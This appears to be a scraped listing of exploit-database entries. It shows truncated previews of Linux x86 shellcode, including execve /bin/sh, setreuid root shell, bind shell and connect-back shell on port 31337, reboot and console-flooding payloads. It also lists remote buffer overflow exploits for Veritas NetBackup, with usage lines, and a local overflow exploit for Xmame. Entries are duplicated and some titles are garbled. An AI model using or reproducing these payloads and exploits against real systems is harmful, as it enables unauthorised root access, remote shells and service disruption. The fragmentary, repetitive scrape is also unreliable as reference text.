linux/x86 getppid() + execve(/proc/pid/exe) 51 bytes

No description provided by source. / linux/x86 getppid + execve"/proc/pid/exe", "/proc/pid/exe", NULL - 51 bytes - izik [email protected] / char shellcode = "\x6a\x40" // push $0x40 "\x58" // pop %eax "\xcd\x80" // int $0x80 // // convert: // "\x4c" // dec %esp "\x99" // cltd "\x6a\x0a" // push $0xa...

linux/x86 execve(/bin/sh) / PUSH - 23 bytes

Exploit for linux/x86 platform in category shellcode =========================================== linux/x86 execve/bin/sh / PUSH - 23 bytes =========================================== / linux/x86 execve"/bin/sh", "/bin/sh", NULL / PUSH - 23 bytes - izik / char shellcode = "\x6a\x0b" // push $0xb...

linux/x86 eject cd-rom (follows /dev/cdrom symlink) + exit() 40 bytes

Exploit for linux/x86 platform in category shellcode ===================================================================== linux/x86 eject cd-rom follows /dev/cdrom symlink + exit 40 bytes ===================================================================== / linux/x86 eject cd-rom follows...

linux/x86 connect-back shellcode 127.0.0.1:31337/tcp 74 bytes

Exploit for linux/x86 platform in category shellcode ============================================================= linux/x86 connect-back shellcode 127.0.0.1:31337/tcp 74 bytes ============================================================= / linux/x86 connect-back shellcode, 127.0.0.1:31337/tcp - ...

linux/x86 Bind /bin/sh to 31337/tcp + fork() 98 bytes

No description provided by source. / linux/x86 bind '/bin/sh' to 31337/tcp + fork - 98 bytes - izik [email protected] / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push %ebx "\x6a\x02" // push $0...

linux/x86 eject cd-rom (follows /dev/cdrom symlink) + exit() 40 bytes

No description provided by source. / linux/x86 eject cd-rom follows "/dev/cdrom" symlink + exit - 40 bytes - izik [email protected] / char shellcode = "\x6a\x05" // push $0x5 "\x58" // pop %eax "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\xb5\x08" // mov $0x8,%ch "\x68\x64\x72\x6f\x6d" // push...

linux/x86 24/7 open cd-rom loop (follows /dev/cdrom symlink) 39 bytes

Exploit for linux/x86 platform in category shellcode ===================================================================== linux/x86 24/7 open cd-rom loop follows /dev/cdrom symlink 39 bytes ===================================================================== / linux/x86 24/7 open cd-rom loop...

linux/x86 reboot - 20 bytes

linux/x86 reboot - 20 bytes. Shellcode exploit for linx86 platform / linux/x86 rebootLINUXREBOOTMAGIC1, LINUXREBOOTMAGIC2, LINUXREBOOTCMDRESTART - 20 bytes - izik / char shellcode = "\x6a\x58" // push $0x58 "\x58" // pop %eax "\xbb\xad\xde\xe1\xfe" // mov $0xfee1dead,%ebx "\xb9\x69\x19\x12\x28" /...

linux/x86 cat /dev/urandom > /dev/console, just for kicks - 63 bytes

Exploit for linux/x86 platform in category shellcode ==================================================================== linux/x86 cat /dev/urandom /dev/console, just for kicks - 63 bytes ==================================================================== / linux/x86 cat /dev/urandom...

linux/x86 setreuid(0 0) + execve(/bin/sh) 31 bytes

No description provided by source. / linux/x86 setreuid0, 0 + execve"/bin/sh", "/bin/sh", NULL, NULL - 31 bytes - izik [email protected] / char shellcode = "\x6a\x46" // push $0x46 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\x31\xc9" // xor %ecx,%ecx "\xcd\x80" // int $0x80 "\x99" // cltd...

linux/x86 connect-back shellcode 127.0.0.1:31337/tcp 74 bytes

linux/x86 connect-back shellcode 127.0.0.1:31337/tcp 74 bytes. Shellcode exploit for linx86 platform / linux/x86 connect-back shellcode, 127.0.0.1:31337/tcp - 74 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx...

linux/x86 Bind /bin/sh to 31337/tcp 80 bytes

linux/x86 Bind /bin/sh to 31337/tcp 80 bytes. Shellcode exploit for linx86 platform / linux/x86 bind '/bin/sh' to 31337/tcp - 80 bytes - izik / char shellcode = "\x6a\x66" // push $0x66 "\x58" // pop %eax "\x99" // cltd "\x6a\x01" // push $0x1 "\x5b" // pop %ebx "\x52" // push %edx "\x53" // push...

linux/x86 execve/bin/sh / PUSH - 23 bytes

linux/x86 execve/bin/sh / PUSH - 23 bytes. Shellcode exploit for linx86 platform / linux/x86 execve"/bin/sh", "/bin/sh", NULL / PUSH - 23 bytes - izik / char shellcode = "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f...

linux/x86 getppid + execve/proc/pid/exe 51 bytes

linux/x86 getppid + execve/proc/pid/exe 51 bytes. Shellcode exploit for linx86 platform / linux/x86 getppid + execve"/proc//exe", "/proc//exe", NULL - 51 bytes - izik / char shellcode = "\x6a\x40" // push $0x40 "\x58" // pop %eax "\xcd\x80" // int $0x80 // // : // "\x4c" // dec %esp "\x99" // clt...

linux/x86 cat /dev/urandom > /dev/console 63 bytes

linux/x86 cat /dev/urandom /dev/console, just for kicks - 63 bytes. Shellcode exploit for linx86 platform / linux/x86 cat /dev/urandom /dev/console, no real profit just for kicks - 63 bytes - izik / char shellcode = "\x31\xc9" // xor %ecx,%ecx "\x51" // push %ecx "\x68\x6e\x64\x6f\x6d" // push...

Veritas NetBackup 4/5 Volume Manager Daemon Remote BoF Exploit

No description provided by source. / DESCRIPTION Veritas NetBackup Stack Overflow tcp/13701 "Volume Manager Daemon" Module Advisories http://www.idefense.com/intelligence/vulnerabilities/display.php?id=336 http://www.frsirt.com/english/advisories/2005/2349 USAGE C:\NetBackupnb 192.168.0.2 4444...

Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow

/ DESCRIPTION Veritas NetBackup Stack Overflow tcp/13701 "Volume Manager Daemon" Module Advisories http://www.idefense.com/intelligence/vulnerabilities/display.php?id=336 http://www.frsirt.com/english/advisories/2005/2349 USAGE C:\NetBackupnb 192.168.0.2 4444 192.168.0.200 0 Veritas NetBackup v4/...

Veritas NetBackup 4/5 Volume Manager Daemon Remote BoF Exploit

Exploit for unknown platform in category remote exploits ============================================================== Veritas NetBackup 4/5 Volume Manager Daemon Remote BoF Exploit ============================================================== / DESCRIPTION Veritas NetBackup Stack Overflow...

Veritas NetBackup 45 - Volume Manager Daemon Remote Buffer Overflow

Veritas NetBackup 45 - Volume Manager Daemon Remote Buffer Overflow / DESCRIPTION Veritas NetBackup Stack Overflow tcp/13701 "Volume Manager Daemon" Module Advisories http://www.idefense.com/intelligence/vulnerabilities/display.php?id=336 http://www.frsirt.com/english/advisories/2005/2349 USAGE...

Xmame 0.102 (-lang) Local Buffer Overflow Exploit (c code)

No description provided by source. / Xmame 0.102 -lang Local Buffer Overflow Exploit Coded BY Qnix [email protected] 0x11 @EFNET icq : 234263 0x11.org Advisory : http://kerneltrap.org/node/6055 e.g: Qnix ./exploit /usr/games/bin/xmame.x11 Xmame 0.102 -lang Local Buffer Overflow Exploit Coded BY Qn...